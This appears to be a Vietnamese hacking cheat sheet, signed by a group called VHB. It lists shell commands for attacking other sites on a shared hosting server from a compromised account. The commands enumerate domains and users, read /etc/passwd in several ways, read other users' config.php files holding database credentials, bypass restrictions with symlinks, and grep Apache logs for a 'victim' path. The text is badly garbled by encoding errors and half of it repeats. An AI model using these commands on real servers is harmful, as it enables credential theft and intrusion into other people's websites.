1) Xem list domain & user tr�n c�ng sever
cd/etc/vdomainaliases;ls-lia
Tr�?ng h?p �?c bi?t khi kh�ng th? xem user n?m c�ng host th? ta th�m && v�o
2)Xem t�n user: t�y v�o distro linux kh�c nhau s? c� c�c c�u l?nh �?c file kh�c nhau.
3)Local sang victim b?ng l?nh dir ( 2013 - gi? hi?m server n�o c?n s�i ��?c)
vd: dir /home/vhb/public_html
4)Xem n?i dung file l?nh xem file c?ng t��ng t? nh� m?c s? 2
-> c� th? s�i c�c l?nh �� thay th? cho cat, less,...
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: t�c d?ng g?n gi?ng nh� t?o shorcut tr�n windows.
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
v?i file 1.txt hay 1.ini l� m?nh t? �?t �? n� t?o li�n k?t t? file config.php �?n.
6) T?m path c?a m?y victim s�i Add on domain
----------------------------------------------
concobe - VHB Group
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com
cd/etc/vdomainaliases;ls-lia
Tr�?ng h?p �?c bi?t khi kh�ng th? xem user n?m c�ng host th? ta th�m && v�o
cd/etc/vdomainaliases && ls-lia
2)Xem t�n user: t�y v�o distro linux kh�c nhau s? c� c�c c�u l?nh �?c file kh�c nhau.
cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd
3)Local sang victim b?ng l?nh dir ( 2013 - gi? hi?m server n�o c?n s�i ��?c)
dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html
4)Xem n?i dung file l?nh xem file c?ng t��ng t? nh� m?c s? 2
-> c� th? s�i c�c l?nh �� thay th? cho cat, less,...
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: t�c d?ng g?n gi?ng nh� t?o shorcut tr�n windows.
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
v?i file 1.txt hay 1.ini l� m?nh t? �?t �? n� t?o li�n k?t t? file config.php �?n.
6) T?m path c?a m?y victim s�i Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
----------------------------------------------
concobe - VHB Group
T?ng h?p nh?ng l?nh shell hay d�ng khi local
4/
5
Oleh
Unknown